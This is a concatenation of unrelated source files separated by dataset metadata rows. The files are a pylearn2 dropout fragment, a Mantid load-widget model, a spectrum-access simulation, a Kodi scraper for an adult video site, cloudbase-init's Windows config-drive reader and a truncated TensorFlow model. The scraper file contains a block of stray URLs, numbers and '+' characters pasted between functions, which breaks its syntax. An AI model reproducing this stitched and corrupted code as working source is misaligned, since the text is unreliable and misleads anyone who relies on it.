str(nrows) + ", " + str(ncols) + "], " "but layer " + self.layer_name + " has window " + str(self.window)) self.output_space = Conv2DSpace( shape=[self.window[2] - self.window[0] + 1, self.window[3] - self.window[1] + 1], num_channels=space.num_channels, axes=axes) @wraps(Layer.get_params) def get_params(self): return [] @wraps(Layer.get_monitoring_channels) def get_monitoring_channels(self): return [] def generate_dropout_mask(mlp, default_include_prob=0.5, input_include_probs=None, rng=(2013, 5, 17)): """ Generate a dropout mask (as an integer) given inclusion probabilities. Parameters ---------- mlp : object An MLP object. default_include_prob : float, optional The probability of including an input to a hidden layer, for layers not listed in `input_include_probs`. Default is 0.5. input_include_probs : dict, optional A dictionary mapping layer names to probabilities of input inclusion for that layer. Default is `None`, in which `default_include_prob` is used for all layers. rng : RandomState object or seed, optional A `numpy.random.RandomState` object or a seed used to create one. Returns ------- mask : int An integer indexing a dropout mask for the network, drawn with the appropriate probability given the inclusion probabilities. """ if input_include_probs is None: input_include_probs = {} if not hasattr(rng, 'uniform'): rng = np.random.RandomState(rng) total_units = 0 mask = 0 for layer in mlp.layers: if layer.layer_name in input_include_probs: p = input_include_probs[layer.layer_name] else: p = default_include_prob for _ in xrange(layer.get_input_space().get_total_dimension()): mask |= int(rng.uniform() < p) << total_units total_units += 1 return mask def sampled_dropout_average(mlp, inputs, num_masks, default_input_include_prob=0.5, input_include_probs=None, default_input_scale=2., input_scales=None, rng=(2013, 5, 17), per_example=False): """ Take the geometric mean over a number of randomly sampled dropout masks for an MLP with softmax outputs. Parameters ---------- mlp : object An MLP object. inputs : tensor_like A Theano variable representing a minibatch appropriate for fpropping through the MLP. num_masks : int The number of masks to sample. default_input_include_prob : float, optional The probability of including an input to a hidden layer, for layers not listed in `input_include_probs`. Default is 0.5. input_include_probs : dict, optional A dictionary mapping layer names to probabilities of input inclusion for that layer. Default is `None`, in which `default_include_prob` is used for all layers. default_input_scale : float, optional The amount to scale input in dropped out layers. input_scales : dict, optional A dictionary mapping layer names to constants by which to scale the input. rng : RandomState object or seed, optional A `numpy.random.RandomState` object or a seed used to create one. per_example : bool, optional If `True`, generate a different mask for every single test example, so you have `num_masks` per example instead of `num_mask` networks total. If `False`, `num_masks` masks are fixed in the graph. Returns ------- geo_mean : tensor_like A symbolic graph for the geometric mean prediction of all the networks. """ if input_include_probs is None: input_include_probs = {} if input_scales is None: input_scales = {} if not hasattr(rng, 'uniform'): rng = np.random.RandomState(rng) mlp._validate_layer_names(list(input_include_probs.keys())) mlp._validate_layer_names(list(input_scales.keys())) if per_example: outputs = [mlp.dropout_fprop(inputs, default_input_include_prob, input_include_probs, default_input_scale, input_scales) for _ in xrange(num_masks)] else: masks = [generate_dropout_mask(mlp, default_input_include_prob, input_include_probs, rng) for _ in xrange(num_masks)] outputs = [mlp.masked_fprop(inputs, mask, None, default_input_scale, input_scales) for mask in masks] return geometric_mean_prediction(outputs) def exhaustive_dropout_average(mlp, inputs, masked_input_layers=None, default_input_scale=2., input_scales=None): """ Take the geometric mean over all dropout masks of an MLP with softmax outputs. Parameters ---------- mlp : object An MLP object. inputs : tensor_like A Theano variable representing a minibatch appropriate for fpropping through the MLP. masked_input_layers : list, optional A list of layer names whose input should be masked. Default is all layers (including the first hidden layer, i.e. mask the input). default_input_scale : float, optional The amount to scale input in dropped out layers. input_scales : dict, optional A dictionary mapping layer names to constants by which to scale the input. Returns ------- geo_mean : tensor_like A symbolic graph for the geometric mean prediction of all exponentially many masked subnetworks. Notes ----- This is obviously exponential in the size of the network, don't do this except for tiny toy networks. """ if masked_input_layers is None: masked_input_layers = mlp.layer_names mlp._validate_layer_names(masked_input_layers) if input_scales is None: input_scales = {} mlp._validate_layer_names(input_scales.keys()) if any(key not in masked_input_layers for key in input_scales): not_in = [key for key in input_scales if key not in mlp.layer_names] raise ValueError(", ".join(not_in) + " in input_scales" " but not masked") num_inputs = mlp.get_total_input_dimension(masked_input_layers) outputs = [mlp.masked_fprop(inputs, mask, masked_input_layers, default_input_scale, input_scales) for mask in xrange(2 ** num_inputs)] return geometric_mean_prediction(outputs) def geometric_mean_prediction(forward_props): """ Take the geometric mean over all dropout masks of an MLP with softmax outputs. Parameters ---------- forward_props : list A list of Theano graphs corresponding to forward propagations through the network with different dropout masks. Returns ------- geo_mean : tensor_like A symbolic graph for the geometric mean prediction of all exponentially many masked subnetworks. Notes ----- This is obviously exponential in the size of the network, don't do this except for tiny toy networks. """ presoftmax = [] for out in forward_props: assert isinstance(out.owner.op, T.nnet.Softmax) assert len(out.owner.inputs) == 1 presoftmax.append(out.owner.inputs[0]) average = reduce(operator.add, presoftmax) / float(len(presoftmax)) return T.nnet.softmax(average) class BadInputSpaceError(TypeError): """ An error raised by an MLP layer when set_input_space is given an object that is not one of the Spaces that layer supports. """ def get_lr_scalers_from_layers(owner): """ Get the learning rate scalers for all member layers of `owner`. Parameters ---------- owner : Model Any Model with a `layers` field Returns ------- lr_scalers : OrderedDict A dictionary mapping parameters of `owner` to learning rate scalers. """ rval = OrderedDict() params = owner.get_params() for layer in owner.layers: contrib = layer.get_lr_scalers() assert isinstance(contrib, OrderedDict) # No two layers can contend to scale a parameter assert not any([key in rval for key in contrib]) # Don't try to scale anything that's not a parameter assert all([key in params for key in contrib]) rval.update(contrib) assert all([isinstance(val, float) for val in rval.values()]) return rval
bsd-3-clause
-8,657,553,449,295,059,000
33.730232
79
0.554054
false
4.164048
false
false
false
mganeva/mantid
scripts/Muon/GUI/MuonAnalysis/load_widget/load_widget_model.py
1
1513
# Mantid Repository : https://github.com/mantidproject/mantid # # Copyright &copy; 2018 ISIS Rutherford Appleton Laboratory UKRI, # NScD Oak Ridge National Laboratory, European Spallation Source # & Institut Laue - Langevin # SPDX - License - Identifier: GPL - 3.0 + from __future__ import (absolute_import, division, print_function) from Muon.GUI.Common.muon_load_data import MuonLoadData class LoadWidgetModel(object): """ The model is responsible for storing the currently loaded run or runs (both the nun numbers, filenames and workspaces) as well as loading new runs using a separate loading thread. """ def __init__(self, loaded_data_store=MuonLoadData(), muon_context=None): self._loaded_data_store = loaded_data_store self._context = muon_context def add_muon_data(self, filename, workspace, run): self._loaded_data_store.add_data(run=run, filename=filename, workspace=workspace) def clear_data(self): self._loaded_data_store.clear() self._context.current_runs = [] def is_filename_loaded(self, filename): return self._loaded_data_store.contains(filename=filename) def is_run_loaded(self, run): return self._loaded_data_store.contains(run=run) @property def workspaces(self): return self._context.current_workspaces @property def runs(self): return self._context.current_runs @property def filenames(self): return self._context.current_filenames
gpl-3.0
1,026,091,008,242,188,000
32.622222
113
0.693985
false
3.708333
false
false
false
maemre/rasim
sim.py
1
10863
#!/usr/bin/env python # Holy import! from __future__ import division from numpy import * from matplotlib import pyplot as P from agent import OptHighestSNR, RandomChannel, IndividualQ, FixChannel from channel.simple import SimpleChannel from traffic.simple import SimpleTraffic from environment import Environment import os # simulation parameters: from params import * from args import argv # create data-output directory output_dir = os.path.join(argv.output_dir, prefix) try: os.mkdir(argv.output_dir) except OSError: pass try: os.mkdir(output_dir) except OSError: pass # generate channel-related stuff # goodness of channels goodness = concatenate((ones(N_good_channel), zeros(N_channel - N_good_channel))) random.shuffle(goodness) # channel generator def gen_chan(i): ch = noise['bad'] if goodness[i]: ch = noise['good'] return SimpleChannel(base_freq + chan_bw * i, **ch) def init_state(i): # disk point picking - http://mathworld.wolfram.com/DiskPointPicking.html r = sqrt(random.rand())*r_init theta = random.rand()*2*pi return { 'state': (random.randint(0, N_channel), random.randint(0, B)), 'x': r*cos(theta), 'y':r*sin(theta), 'id': i, 'speed': 0 if i < N_stationary_agent else 30. / 3.6 * t_slot # 30 kph } if argv.agents is None: print 'No agent type is specified. Simulation cannot run. For details run rasim with "--help" option' exit(1) agent_types = [] for i in [RandomChannel, IndividualQ, OptHighestSNR]: # + [FixChannel, OptHighestSNR] if i.__name__ in argv.agents: agent_types.append(i) paths = {} for a in agent_types: paths[a] = os.path.join(output_dir, a.__name__) try: os.mkdir(paths[a]) except OSError: pass # init statistics avg_energies = zeros([len(agent_types), N_agent, t_total]) en_type = zeros([len(agent_types), t_total]) avg_bits = zeros([len(agent_types), N_agent, t_total]) bits_type = zeros([len(agent_types), t_total], dtype=int_) en_idle = zeros([len(agent_types), N_agent, t_total]) en_sense = zeros([len(agent_types), N_agent, t_total]) en_sw = zeros([len(agent_types), N_agent, t_total]) en_tx = zeros([len(agent_types), N_agent, t_total]) buf_overflow = zeros([len(agent_types), N_agent, t_total], dtype=int_) buf_levels = zeros([len(agent_types), N_agent, t_total], dtype=int_) init_positions = zeros([len(agent_types), N_runs, N_agent, 2]) last_positions = zeros([len(agent_types), N_runs, N_agent, 2]) ############# # Arrays below are reused for each agent type and their values are saved per agent ype for # small memory footprint!! ############# # Channel traffic record. 0 = no traffic, 1 = PU traffic channel_traf = zeros([N_channel, N_runs, t_total], dtype=int_) # Agent transmission record. 0..N_channel-1 = transimt over given channel, N_channel = idle # a huge matrix indeed transmissions = zeros([N_runs, N_agent, t_total]) def run_simulation(agent_type, agent_no): global avg_energies, en_type, avg_bits, bits_type, buf_overflow # channels themselves channels = [gen_chan(i) for i in xrange(N_channel)] # channel traffics traffics = [SimpleTraffic() for i in xrange(N_channel)] env = Environment(channels, traffics, pd=0.9, pf=0.1) if argv.verbose or not batch_run: print 'Agent type:', agent_type.__name__ for n_run in xrange(N_runs): # generate agents agents = [agent_type(env, init_state(i)) for i in xrange(N_agent)] env.set_agents(agents) init_positions[agent_no, n_run] = [(a.x, a.y) for a in agents] energies = zeros([N_agent, t_total]) bits = zeros([N_agent, t_total]) if argv.verbose or not batch_run: print "Run #%d of %d(agent), %d of %d(total)" % (n_run + 1, N_runs, n_run + agent_no * N_runs + 1, N_runs * len(agent_types)) rates = [0,0,0,0,0] for t in xrange(t_total): env.next_slot() channel_traf[:,n_run,t] = env.t_state # get actions actions = [a.act_then_idle() for a in agents] # collect statistics for buffer overflow and buffer levels for i, a in enumerate(agents): buf_overflow[agent_no, i, t] = int(a.buf_overflow) buf_levels[agent_no, i, t] += B - a.B_empty # collisions per channel where, # N_agent: PU collision, (0..N_agent-1): SU collision with ID # -1: No collision collisions = [N_agent if traffic else -1 for traffic in env.t_state] collided = [False] * N_agent for i, a in enumerate(actions): if a['action'] == ACTION.TRANSMIT: if collisions[a['channel']] == N_agent: # collision with PU, mark agent as collided collided[i] = True rates[4] += 1 elif collisions[a['channel']] >= 0: # collision with SU, mark both agents as collided collided[i] = collided[collisions[a['channel']]] = True else: # no collision *yet* collisions[a['channel']] = i transmissions[n_run, i, t] = a['channel'] else: transmissions[n_run, i, t] = N_channel # For each agent compute transmission successes and report # transmission success/failure to agent for i, a in enumerate(agents): # collect energy usage statistics energies[i, t] = a.E_slot en_type[agent_no, t] += a.E_slot en_idle[agent_no, i, t] += a.E_idle en_sense[agent_no, i, t] += a.E_sense en_tx[agent_no, i, t] += a.E_tx en_sw[agent_no, i, t] += a.E_sw act = actions[i] # send feedback to idle agents too if act['action'] == ACTION.IDLE: a.feedback(False, False, idle=True) # if collision occurred, report collusion if collided[i]: a.feedback(collision=True, success=False) rates[0] += 1 continue if act['action'] != ACTION.TRANSMIT: rates[3] += 1 continue ch = env.channels[act['channel']] # no collision, check transmission success by channel quality pkt_sent = ch.transmission_successes(act['power'], act['bitrate'], act['pkt_size'], act['n_pkt'], a.x, a.y) # give feedback if pkt_sent == 0: a.feedback(collision=False, success=False) else: a.feedback(collision=False, success=True, N_pkt=pkt_sent) rates[1] += pkt_sent * 1.0 / act['n_pkt'] rates[2] += act['n_pkt'] - pkt_sent # collect bit transmission statistics bits[i, t] = pkt_sent * act['pkt_size'] bits_type[agent_no, t] += pkt_sent * act['pkt_size'] # save energies #savetxt('energy_%d.txt' % n_run, energies) # take averages avg_energies[agent_no] += energies avg_bits[agent_no] += bits # print stats rates[4] = rates[4] / (t_total * N_channel) * 100 if argv.verbose or not batch_run: print "Collisions: %d\nSuccesses: %f\nLost in Channel: %d\nIdle: %d\n%%PU Collisions: %f" % tuple(rates) print "%Success:", rates[1]/(t_total*N_agent - rates[3]) * 100 print "%Collided channels:", rates[0]/(t_total*N_channel) * 100 print last_positions[agent_no, n_run] = [(a.x, a.y) for a in agents] # save statistics save(os.path.join(output_dir, agent_type.__name__, 'channel_traf.npy'), channel_traf) save(os.path.join(output_dir, agent_type.__name__, 'transmissions.npy'), transmissions) for i, agent_type in enumerate(agent_types): run_simulation(agent_type, i) buf_levels /= N_runs avg_energies /= N_runs avg_bits /= N_runs en_idle /= N_runs en_sense /= N_runs en_tx /= N_runs en_sw /= N_runs # give outputs if not batch_run: P.figure() for i, agent_type in enumerate(agent_types): P.plot(cumsum(en_type[i])/cumsum(bits_type[i]), label=agent_type.__name__) P.legend() P.xlabel('Time (time slots)') P.ylabel('Energy/bit (cumulative)') P.title('Efficiency (Cumulative Energy/bit) vs Time') P.figure() for i, agent_type in enumerate(agent_types): P.plot(convolve(buf_overflow[i].sum(axis=0)/(N_agent*1.0), [1./7]*7), label=agent_type.__name__) P.legend() P.xlabel('Time (time slots)') P.ylabel('# of buffer overflows (7-point avg, per agent)') P.title('Buffer Overflows vs Time') P.figure() P.bar(arange(len(agent_types)), buf_overflow.sum(axis=(1,2))) P.legend() P.xlabel('Agent Type') P.ylabel('# of buffer overflows (avg, per agent)') P.xticks(arange(len(agent_types) + 1), [x.__name__ for x in agent_types] + ['']) P.title('Buffer overflows vs Agent Type') P.figure() for i, agent_type in enumerate(agent_types): P.plot(buf_levels[i].sum(axis=0)/(N_agent*1.0), label=agent_type.__name__) P.legend() P.xlabel('Time (time slots)') P.ylabel('buffer occupancy') P.title('Buffer Occupancy (avg) vs Time') P.figure() for i, agent_type in enumerate(agent_types): P.plot(cumsum(en_idle[i].sum(axis=0) / N_agent), label=agent_type.__name__) P.legend() P.xlabel('Time (time slots)') P.ylabel('Avg Idle Energy (cumulative)') P.title('Idle Energy vs Time') P.show() print "Throughput:" for i, agent_type in enumerate(agent_types): print "\t%s:\t%f" % (agent_type.__name__, sum(bits_type[i])) # save statistics # save agent types with open(os.path.join(output_dir, 'agents.txt'), 'w') as f: f.write('\n'.join(x.__name__ for x in agent_types)) save(os.path.join(output_dir, 'avg_energies.npy'), avg_energies) save(os.path.join(output_dir, 'avg_bits.npy'), avg_bits) save(os.path.join(output_dir, 'en_idle.npy'), en_idle) save(os.path.join(output_dir, 'en_sense.npy'), en_sense) save(os.path.join(output_dir, 'en_tx.npy'), en_tx) save(os.path.join(output_dir, 'en_sw.npy'), en_sw) save(os.path.join(output_dir, 'en_type.npy'), en_type) save(os.path.join(output_dir, 'buf_overflow.npy'), buf_overflow) save(os.path.join(output_dir, 'buf_levels.npy'), buf_overflow) save(os.path.join(output_dir, 'init_positions.npy'), init_positions) save(os.path.join(output_dir, 'last_positions.npy'), last_positions)
apache-2.0
5,194,816,224,260,189,000
38.220217
137
0.58308
false
3.309872
false
false
false
alfa-jor/addon
plugin.video.alfa/channels/sxyprn.py
1
6787
# -*- coding: utf-8 -*- #------------------------------------------------------------ import urlparse,re from platformcode import config, logger from core import scrapertools from core.item import Item from core import servertools from core import httptools host = 'https://www.sxyprn.com' def mainlist(item): logger.info() itemlist = [] itemlist.append( Item(channel=item.channel, title="Nuevos" , action="lista", url=host + "/blog/all/0.html?fl=all&sm=latest")) itemlist.append( Item(channel=item.channel, title="Mas vistos" , action="lista", url=host + "/popular/top-viewed.html")) itemlist.append( Item(channel=item.channel, title="Mejor valorada" , action="lista", url=host + "/popular/top-rated.html")) itemlist.append( Item(channel=item.channel, title="Sitios" , action="categorias", url=host)) itemlist.append( Item(channel=item.channel, title="Categorias" , action="categorias", url=host)) itemlist.append( Item(channel=item.channel, title="Buscar", action="search")) return itemlist def search(item, texto): logger.info() texto = texto.replace(" ", "-") item.url = host + "/%s.html" % texto try: return lista(item) except: import sys for line in sys.exc_info(): logger.error("%s" % line) return [] def categorias(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|&nbsp;|<br>|<br/>", "", data) if "Sitios" in item.title: patron = "<a href='([^']+)' target='_blank'><div class='top_sub_el top_sub_el_sc'>.*?" patron += "<span class='top_sub_el_key_sc'>([^<]+)</span>" patron += "<span class='top_sub_el_count'>(\d+)</span>" else: patron = "<a class='tdn' href='([^']+)'.*?" patron += "<span class='htag_el_tag'>([^<]+)</span>" patron += "<span class='htag_el_count'>(\d+) videos</span>" matches = re.compile(patron,re.DOTALL).findall(data) for scrapedurl,scrapedtitle,cantidad in matches: scrapedplot = "" scrapedthumbnail = "" scrapedurl = urlparse.urljoin(item.url,scrapedurl) title = scrapedtitle + " (" + cantidad + ")" itemlist.append( Item(channel=item.channel, action="lista", title=title, url=scrapedurl, thumbnail=scrapedthumbnail , plot=scrapedplot) ) return itemlist def lista(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|&nbsp;|<br>|<br/>", "", data) patron = "<img class=.*?" patron += " src='([^']+)'.*?" patron += "<span class='duration_small'.*?'>([^<]+)<.*?" patron += "<span class='shd_small'.*?>([^<]+)<.*?" patron += "post_time' href='([^']+)' title='([^']+)'" matches = re.compile(patron,re.DOTALL).findall(data) for scrapedthumbnail,scrapedtime,quality,scrapedurl,scrapedtitle in matches: title = "[COLOR yellow]%s[/COLOR] [COLOR red]%s[/COLOR] %s" % (scrapedtime,quality,scrapedtitle) thumbnail = "https:" + scrapedthumbnail scrapedurl = urlparse.urljoin(item.url,scrapedurl) plot = "" itemlist.append( Item(channel=item.channel, action="play", title=title, url=scrapedurl, thumbnail=thumbnail, fanart=thumbnail, plot=plot, contentTitle = scrapedtitle)) # next_page = scrapertools.find_single_match(data, "<div class='ctrl_el ctrl_sel'>.*?<a href='([^']+)'") if next_page: next_page = urlparse.urljoin(item.url,next_page) itemlist.append( Item(channel=item.channel, action="lista", title="Página Siguiente >>", text_color="blue", url=next_page) ) return itemlist 130 https://www.sxyprn.com/cdn8/c9/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/65xbtac5i3dbd568c4r9z4575at/g5fd37a74djew1zev21dm176g86.vid data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/e1y9b3mzc1o101lzg5q2cze1j390h\/kK-CN4l73_EeBhkoYNYA2A\/1568228437\/65xbtac5i3dbd568c4r9z4575at\/g5fd37a74djew1zev21dm176g86.vid -114 data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/m1v963ez51m1u11za5u2xz41e3806\/BQFIcJlTMr0-Z1gVUTxgaQ\/1568228604\/je54bwaz5r3xbn5a864k91487sa\/o5sd17r7xdaea1be32xd41b6b8z.vid https://www.sxyprn.com/cdn8/c9/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/je54bwaz5r3xbn5a864k91487sa/o5sd17r7xdaea1be32xd41b6b8z.vid -137 data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/5v1n993kzs1n1f1ozc5b20zg1o350\/NCnvDdBfOQmJOivEflNSww\/1568229437\/05pbja75c39br5m8q41974z7haf\/v85edl7b76diej12eb2wd7136v8.vid https://www.sxyprn.com/cdn8/c9/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/05pbja75c39br5m8q41974z7haf/v85edl7b76diej12eb2wd7136v8.vid -106 data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/41v9b3nzc1q1615zr5n2szw153905\/9LeO2lux-GrgOaEPfMONcA\/1568230473\/1d52b3aa5s36bt5d8o4a9m427pa\/zh5sdc7k7ndee11qe42sdz1h6j8.vid https://www.sxyprn.com/cdn8/c9/41v9b3nzc1q1615zr5n2szw153905/9LeO2lux-GrgOaEPfMONcA/1568230367/1d52b3aa5s36bt5d8o4a9m427pa/zh5sdc7k7ndee11qe42sdz1h6j8.vid https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/5ba53b584947a/5d77de1e2d168.vid https://c9.trafficdeposit.com/vidi/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/5ba53b584947a/5d77de1e2d168.vid + + + + + + + + + + + 193111152130 + + + + + + + + + + + https://c9.trafficdeposit.com/vidi/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid def play(item): itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|amp;|\s{2}|&nbsp;", "", data) url = scrapertools.find_single_match(data, 'data-vnfo=.*?":"([^"]+)"') url = url.replace("\/", "/").replace("/cdn/", "/cdn8/") url = urlparse.urljoin(item.url,url) itemlist = servertools.find_video_items(item.clone(url = url, contentTitle = item.title)) # itemlist.append( Item(channel=item.channel, action="play",server=directo, title = item.title, url=url)) return itemlist
gpl-3.0
4,249,873,821,578,241,500
55.082645
167
0.620395
false
2.770927
false
false
false
cmin764/cloudbase-init
cloudbaseinit/metadata/services/osconfigdrive/windows.py
1
8485
# Copyright 2012 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import itertools import os import shutil import struct import tempfile import uuid from oslo_config import cfg from oslo_log import log as oslo_logging from cloudbaseinit import exception from cloudbaseinit.metadata.services.osconfigdrive import base from cloudbaseinit.osutils import factory as osutils_factory from cloudbaseinit.utils.windows import disk from cloudbaseinit.utils.windows import vfat opts = [ cfg.StrOpt('bsdtar_path', default='bsdtar.exe', help='Path to "bsdtar", used to extract ISO ConfigDrive ' 'files'), ] CONF = cfg.CONF CONF.register_opts(opts) LOG = oslo_logging.getLogger(__name__) CONFIG_DRIVE_LABEL = 'config-2' MAX_SECTOR_SIZE = 4096 # Absolute offset values and the ISO magic string. OFFSET_BOOT_RECORD = 0x8000 OFFSET_ISO_ID = OFFSET_BOOT_RECORD + 1 ISO_ID = b'CD001' # Little-endian unsigned short size values. OFFSET_VOLUME_SIZE = OFFSET_BOOT_RECORD + 80 OFFSET_BLOCK_SIZE = OFFSET_BOOT_RECORD + 128 PEEK_SIZE = 2 class WindowsConfigDriveManager(base.BaseConfigDriveManager): def __init__(self): super(WindowsConfigDriveManager, self).__init__() self._osutils = osutils_factory.get_os_utils() def _check_for_config_drive(self, drive): label = self._osutils.get_volume_label(drive) if label and label.lower() == CONFIG_DRIVE_LABEL and \ os.path.exists(os.path.join(drive, 'openstack\\latest\\' 'meta_data.json')): LOG.info('Config Drive found on %s', drive) return True return False def _get_iso_file_size(self, device): if not device.fixed: return None if not device.size > (OFFSET_BLOCK_SIZE + PEEK_SIZE): return None off = device.seek(OFFSET_ISO_ID) magic = device.read(len(ISO_ID), skip=OFFSET_ISO_ID - off) if ISO_ID != magic: return None off = device.seek(OFFSET_VOLUME_SIZE) volume_size_bytes = device.read(PEEK_SIZE, skip=OFFSET_VOLUME_SIZE - off) off = device.seek(OFFSET_BLOCK_SIZE) block_size_bytes = device.read(PEEK_SIZE, skip=OFFSET_BLOCK_SIZE - off) volume_size = struct.unpack("<H", volume_size_bytes)[0] block_size = struct.unpack("<H", block_size_bytes)[0] return volume_size * block_size def _write_iso_file(self, device, iso_file_path, iso_file_size): with open(iso_file_path, 'wb') as stream: offset = 0 # Read multiples of the sector size bytes # until the entire ISO content is written. while offset < iso_file_size: real_offset = device.seek(offset) bytes_to_read = min(MAX_SECTOR_SIZE, iso_file_size - offset) data = device.read(bytes_to_read, skip=offset - real_offset) stream.write(data) offset += bytes_to_read def _extract_files_from_iso(self, iso_file_path): args = [CONF.bsdtar_path, '-xf', iso_file_path, '-C', self.target_path] (out, err, exit_code) = self._osutils.execute_process(args, False) if exit_code: raise exception.CloudbaseInitException( 'Failed to execute "bsdtar" from path "%(bsdtar_path)s" with ' 'exit code: %(exit_code)s\n%(out)s\n%(err)s' % { 'bsdtar_path': CONF.bsdtar_path, 'exit_code': exit_code, 'out': out, 'err': err}) def _extract_iso_from_devices(self, devices): """Search across multiple devices for a raw ISO.""" extracted = False iso_file_path = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()) + '.iso') for device in devices: try: with device: iso_file_size = self._get_iso_file_size(device) if iso_file_size: LOG.info('ISO9660 disk found on %s', device) self._write_iso_file(device, iso_file_path, iso_file_size) self._extract_files_from_iso(iso_file_path) extracted = True break except Exception as exc: LOG.warning('ISO extraction failed on %(device)s with ' '%(error)r', {"device": device, "error": exc}) if os.path.isfile(iso_file_path): os.remove(iso_file_path) return extracted def _get_config_drive_from_cdrom_drive(self): for drive_letter in self._osutils.get_cdrom_drives(): if self._check_for_config_drive(drive_letter): os.rmdir(self.target_path) shutil.copytree(drive_letter, self.target_path) return True return False def _get_config_drive_from_raw_hdd(self): disks = map(disk.Disk, self._osutils.get_physical_disks()) return self._extract_iso_from_devices(disks) def _get_config_drive_from_vfat(self): for drive_path in self._osutils.get_physical_disks(): if vfat.is_vfat_drive(self._osutils, drive_path): LOG.info('Config Drive found on disk %r', drive_path) vfat.copy_from_vfat_drive(self._osutils, drive_path, self.target_path) return True return False def _get_config_drive_from_partition(self): for disk_path in self._osutils.get_physical_disks(): physical_drive = disk.Disk(disk_path) with physical_drive: partitions = physical_drive.partitions() extracted = self._extract_iso_from_devices(partitions) if extracted: return True return False def _get_config_drive_from_volume(self): """Look through all the volumes for config drive.""" volumes = self._osutils.get_volumes() for volume in volumes: if self._check_for_config_drive(volume): os.rmdir(self.target_path) shutil.copytree(volume, self.target_path) return True return False def _get_config_drive_files(self, cd_type, cd_location): get_config_drive = self.config_drive_type_location.get( "{}_{}".format(cd_location, cd_type)) if get_config_drive: return get_config_drive() else: LOG.debug("Irrelevant type %(type)s in %(location)s location; " "skip", {"type": cd_type, "location": cd_location}) return False def get_config_drive_files(self, searched_types=None, searched_locations=None): searched_types = searched_types or [] searched_locations = searched_locations or [] for cd_type, cd_location in itertools.product(searched_types, searched_locations): LOG.debug('Looking for Config Drive %(type)s in %(location)s', {"type": cd_type, "location": cd_location}) if self._get_config_drive_files(cd_type, cd_location): return True return False @property def config_drive_type_location(self): return { "cdrom_iso": self._get_config_drive_from_cdrom_drive, "hdd_iso": self._get_config_drive_from_raw_hdd, "hdd_vfat": self._get_config_drive_from_vfat, "partition_iso": self._get_config_drive_from_partition, "partition_vfat": self._get_config_drive_from_volume, }
apache-2.0
-5,127,092,252,806,962,000
37.568182
78
0.576429
false
3.941013
true
false
false
WhatDo/FlowFairy
examples/sine_fix/gglu_nopool.py
1
3674
import tensorflow as tf import tensorflow.contrib.slim as slim from flowfairy.conf import settings from util import lrelu, conv2d, maxpool2d, embedding, avgpool2d, GLU, causal_GLU from functools import partial import ops discrete_class = settings.DISCRETE_CLASS batch_size = settings.BATCH_SIZE samplerate = sr = settings.SAMPLERATE dropout = settings.DROPOUT learning_rate = settings.LEARNING_RATE embedding_size = settings.EMBEDDING_SIZE num_classes = settings.CLASS_COUNT def broadcast(l, emb): sh = l.get_shape().as_list()[1] emb = emb[:, None, None, :] emb = tf.tile(emb, (1,sh,1,1)) return tf.concat([l, emb], 3) # Create model def conv_net(x, cls, dropout, is_training=False): xs = tf.expand_dims(x, -1) xs = tf.expand_dims(xs, -1) conv1 = causal_GLU(xs, 4, [256, 1], scope='conv1_1', normalizer_fn=slim.batch_norm, normalizer_params={'is_training': is_training, 'decay': 0.9}) conv1 = GLU(conv1, 4, [256, 1], scope='conv1_2') #pool1 = slim.max_pool2d(conv1, [2,1]) print('conv1: ', conv1) #with tf.name_scope('embedding'): with tf.variable_scope('embedding'): emb1 = embedding(cls, embedding_size, num_classes) embedded = broadcast(conv1, emb1) print('embedded:', embedded) #convblock 2 conv2 = GLU(embedded, 8, [256, 1], scope='conv2_1') conv2 = GLU(conv2, 8, [256, 1], scope='conv2_2') #pool2 = slim.max_pool2d(conv2, [2,1]) print('conv2: ', conv2) #convblock 3 conv3 = GLU(conv2, 16, [256, 1], scope='conv3_1') conv3 = GLU(conv3, 16, [256, 1], scope='conv3_2') print('conv3: ', conv3) #convblock 4 #conv4 = tf.depth_to_space(conv3, 4) #upconv #print('d2sp: ', conv4) #conv4 = tf.reshape(conv4, shape=[-1, sr, 1, 4]) # reshape upconvolution to have proper shape conv4 = GLU(conv3, 16, [256, 1], scope='conv4_1') conv4 = GLU(conv4, 16, [256, 1], scope='conv4_2') print('conv4: ', conv4) #convblock 5 conv5 = tf.concat([conv4, conv1], 3) # <- unet like concat first with last conv5 = GLU(conv5, 16, [256, 1], scope='conv5') conv5 = GLU(conv5, discrete_class, [2,1], scope='out') print('conv5: ', conv5) #out out = tf.reshape(conv5, [-1, sr, discrete_class]) print('out: ', out) return out class Net: def __init__(self): pass def feedforward(self, x, y, frqid, frqid2, is_training=False): pred = conv_net(x, frqid, None, is_training) target_output = tf.reshape(y,[-1]) prediction = tf.reshape(pred,[-1, discrete_class]) # Define loss and optimizer cost = tf.losses.sparse_softmax_cross_entropy(logits = prediction, labels = target_output, scope='xentropy') correct_pred = tf.equal(tf.argmax(pred, 2), y) with tf.name_scope('accuracy'): accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32)) return pred, cost, accuracy def train(self, **kwargs): self.train_x = 